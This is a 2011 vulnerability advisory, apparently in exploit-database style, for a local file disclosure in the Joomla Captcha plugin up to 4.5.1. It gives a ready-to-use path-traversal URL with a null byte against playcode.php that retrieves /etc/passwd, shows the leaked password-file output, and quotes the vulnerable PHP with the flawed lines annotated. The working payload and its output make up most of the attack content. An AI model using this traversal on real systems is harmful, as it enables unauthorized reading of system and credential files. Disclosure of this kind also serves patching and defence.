:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
#############################################################################
# [ Joomla Captcha Plugin <= 4.5.1 ] Local File Disclosure Vulnerability #
#############################################################################
#
# Script: "Joomla Captcha plugin and patch for Joomla!"
#
# Script site: http://www.kupala.net/
# Download: http://code.google.com/p/joomla15captcha/
#
#
# [LFI] (magic_quotes_gpc = Off)
# Vuln: http://site.com/plugins/system/captcha/playcode.php?lng=../../../../../../../etc/passwd%00
# dun@radius ~ $ cat joomlacaptcha.mp3
# root:x:0:0:root:/root:/bin/bash
# ......
#
# File: ./plugins/system/captcha/playcode.php
#
# 79 if (!$captchacode) $captchacode = '0000000000';
# 80
# 81 session_write_close();
# 82
# 83 @$lng = $_GET['lng']; // [1]
# 84 if ( !$lng ) $lng = 'en-gb';
# 85
# 86 $captchafilename = "joomlacaptcha.mp3";
# 87 $captchalength = strlen( $captchacode );
# 88
# 89 $outlength = 0;
# 90 $reallength = 0;
# 91 $currsize = 0;
# 92 $outstream = '';
# 93
# 94 if ($captchalength > 0) {
# 95 for ($i = 0; $i < $captchalength; $i++) {
# 96 $soundfiles[$i] = 'files/' . $lng . '.' . strtolower( substr( $captchacode, $i, 1 ) ) . '.mp3'; // [2]
# 97 }
# 98 foreach ($soundfiles as $onefile){ //
# 99 if (file_exists( $onefile )) { //
# 100 $instream = fopen( $onefile, 'rb' ); //
# 101 $currsize = filesize( $onefile ); // [3]
# 102 $outstream .= fread( $instream, $currsize ); //
# 103 $outlength += $currsize; //
# 104 fclose( $instream ); //
# 105 $reallength += 1; //
# 106 }
# 107 }
# 108 }
# 109
# 110 if (($outstream == '') || ($captchalength != $reallength)) {
# 111 $outstream = 0; $outlength = 1;
# 112 }
# 113
# 114 ob_start();
# 115 header( 'Content-Type: audio/x-mpeg'); //
# 116 header( "Content-Disposition: attachment; filename=$captchafilename;"); //
# 117 header( 'Content-Transfer-Encoding: binary'); //
# 118 header( 'Content-Length: '.$outlength); //
# 119 echo $outstream ; // [4] LFD
# 120 ob_end_flush();
#
#
# [ dun / 2011-01-09 ]